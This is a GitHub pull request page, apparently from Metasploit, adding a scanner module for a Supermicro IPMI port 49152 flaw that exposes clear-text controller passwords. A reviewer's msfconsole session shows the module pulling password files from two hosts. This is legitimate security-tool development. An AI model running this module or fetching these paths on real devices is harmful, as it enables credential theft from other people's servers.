Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add a module for the SMC IPMI Port 49152 file exposure vulnerability. #3465

Merged
merged 5 commits into from Jun 20, 2014

Conversation

hdm
Copy link
Contributor

@hdm hdm commented Jun 19, 2014

This module abuses a file exposure vulnerability accessible through the web interface on port 49152 of Supermicro Onboard IPMI controllers.

The vulnerability allows an attacker to obtain detailed device information and download data files containing the clear-text usernames and passwords for the controller.

In May of 2014, at least 30,000 unique IPs were exposed to the internet with this vulnerability.

@todb-r7 todb-r7 added the module label Jun 20, 2014
@jhart-r7
Copy link
Contributor

I can confirm that this works on known vulnerable targets:

msf > use auxiliary/scanner/http/smt_ipmi_49152_exposure
msf auxiliary(smt_ipmi_49152_exposure) > TS supermicro-bmc1.vuln supermicro-bmc2.vuln
RHOSTS => supermicro-bmc1.vuln supermicro-bmc2.vuln
msf auxiliary(smt_ipmi_49152_exposure) > run

[+] 10.4.16.93:49152 - Stored the device description XML in /home/jhart/.msf4/loot/20140620141950_default_10.4.16.93_supermicro.ipmi._199482.xml
[+] 10.4.16.93:49152 - Password data from /PSBlock stored to /home/jhart/.msf4/loot/20140620141950_default_10.4.16.93_supermicro.ipmi._437007.bin
[+] 10.4.16.93:49152 - Password data from /wsman/simple_auth.passwd stored to /home/jhart/.msf4/loot/20140620141950_default_10.4.16.93_supermicro.ipmi._904417.bin
[*] Scanned 1 of 2 hosts (050% complete)
[+] 10.4.16.94:49152 - Stored the device description XML in /home/jhart/.msf4/loot/20140620141950_default_10.4.16.94_supermicro.ipmi._173393.xml
[+] 10.4.16.94:49152 - Password data from /PSBlock stored to /home/jhart/.msf4/loot/20140620141950_default_10.4.16.94_supermicro.ipmi._411213.bin
[+] 10.4.16.94:49152 - Password data from /wsman/simple_auth.passwd stored to /home/jhart/.msf4/loot/20140620141950_default_10.4.16.94_supermicro.ipmi._231015.bin
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed

@jvazquez-r7
Copy link
Contributor

Awesome, thanks @jhart-r7 for confirming, I'm going to handle it in a while so!

@jvazquez-r7 jvazquez-r7 merged commit fa5fc72 into rapid7:master Jun 20, 2014
jvazquez-r7 added a commit that referenced this pull request Jun 20, 2014
@hdm hdm deleted the module/supermicro-psblock branch August 26, 2014 19:45
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

4 participants